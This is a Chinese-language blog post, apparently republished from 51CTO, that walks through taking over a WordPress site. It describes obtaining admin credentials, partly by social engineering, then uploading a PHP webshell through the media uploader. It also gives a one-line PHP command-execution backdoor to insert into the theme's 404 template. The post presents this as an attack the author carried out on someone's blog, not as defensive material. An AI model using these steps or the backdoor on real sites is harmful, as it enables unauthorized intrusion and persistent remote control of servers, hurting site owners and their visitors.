wordpress拿WebShell
wordpress拿WebShell
Simeon 安天365
WordPress是世界上用的最多的一款blog,可以說是世界流行,在前段時間爆出有一個任意檔案漏洞,但由於時間很忙就沒有進行測試,最近偶然拿到一個wordpress的blog,實際測試效果不錯,下面將整個過程寫出來跟朋友分享。
(一)獲取管理員使用者名稱和密碼
關於如何獲取管理員使用者和密碼不在本文的主要討論範圍,筆者有兩點經驗,一個是社工;另外一個就是已有資訊的利用;在獲取Webshell的情況下,對現有資訊的分析和利用,有可能獲取WordPress後臺管理密碼。WordPress後臺位置一般為:http://www.xxx.com/blog/wp-admin,顯示頁面如圖1所示,輸入正確的使用者名稱和密碼後順利登入,如圖2所示。
圖1 WordPress登入後臺
圖2 成功登入後臺
(二)尋找上傳處
在WordPress管理頁面的左邊單擊“媒體”–“新增媒體案”,接著就會出來一個上傳的介面,在該介面中選擇“Browser 上傳功能”,如圖3所示,直接選擇php的Webshell上傳即可。
圖3 獲取上傳頁面
(三)瀏覽上傳記錄
上傳Webshell後,有些系統裝有防毒軟體會查殺部分Webshell,因此需要通過瀏覽記錄來驗證檔案是否上傳,系統在上傳WebShell後會自動重新整理,如果上傳沒有出現問題,則會如圖4所示,上傳檔案顯示在媒體庫中。
圖4 檢視上傳的Webshell記錄
(四)獲取Webshell的直接地址
將滑鼠移動到上傳的Webshell記錄上,可以看到有三個按鈕“編輯”、“刪除”和“檢視”,單擊檢視即可訪問Webshell的具體頁面,如圖5所示,選擇記錄中的連結,該連結地址即為真正的Webshell地址。
圖5 獲取上傳的Webshell頁面
(五)獲取WebShell
直接開啟Webshell的地址,輸入密碼驗證成功後,進入熟悉的Webshell介面,如圖6所示,至此拿到了WordPress的Webshell。
圖6獲取WebShell
(六)其他方法獲取Webshell探討
通過詢問群裡好友,感謝cnbird提供的一個方法,不過我測試後未能獲取Webshell,不知是咋個回事,現將利用方法奉上:
(1)進入後臺
(2)單擊“外觀”–“編輯”–“404模板”插入一句話木馬程式程式碼:<?php@system($_REQUEST[c]);?>,如圖7所示,插入後進行更新。
(3)使用連線地址wordpress/wp-content/themes/default/404.php進行連線。結果沒有反應,很是鬱悶!
圖7 插入一句話程式碼
本文轉自 simeon2005 51CTO部落格,原文連結:http://blog.51cto.com/simeon/277369
相關文章
- disucz6.1後臺拿webshellWebshell
- 南方資料企業網站(資料庫備份拿webshell)網站資料庫Webshell
- Deformity JSP Webshell、Webshell Hidden LearningORMMITJSWebshell
- webshell流量特徵Webshell特徵
- WebShell系列(一)---XMLWebshellXML
- webshell是什麼Webshell
- Webshell安全檢測篇Webshell
- PHP 安全之 webshell 分析PHPWebshell
- webshell應急排查方案Webshell
- nginx 防 webshell 跨目錄NginxWebshell
- webshell安全測試工具WeevelyWebshell
- webshell是什麼意思,怎麼檢測網站是否被留下webshell後門?Webshell網站
- 應急響應-webshell查殺Webshell
- WebShell流量特徵檢測_哥斯拉篇Webshell特徵
- Webshell-Part1&Part2Webshell
- Django3使用WebSocket實現WebShellDjangoWebshell
- phpMyadmin通過日誌寫webshellPHPWebshell
- webshell 管理工具流量特徵分析Webshell特徵
- WordPress入門09-WordPress基本設定
- 如何利用 Webshell 診斷 EDAS Serverless 應用WebshellServer
- 基於Websocket的簡易webshell實現Webshell
- 從後臺得到webshell技巧大彙總Webshell
- 菜刀、冰蠍、蟻劍、哥斯拉Webshell流量特徵Webshell特徵
- WordPress 外掛
- WordPressFeedSQLInjectionSQL
- 玩轉wordpress
- 安裝wordpress教程詳細安裝wordpress步揍
- WordPress開發入門09:WordPress編碼標準
- 怎麼清理webshell木馬後門檔案Webshell
- 從後臺到webshell的一點思路(轉)Webshell
- 中轉Webshell繞過流量檢測防護Webshell
- WordPress入門08-WordPress設定導航選單
- centos 下搭建wordpressCentOS
- 建立 wordpress 外掛
- 基於PHP的Webshell自動檢測芻議PHPWebshell
- 網站漏洞修復 上傳webshell漏洞修補網站Webshell
- 記一次網站被攻擊 WebShell 分析網站Webshell
- 本地檔案包含之包含日誌獲取webshellWebshell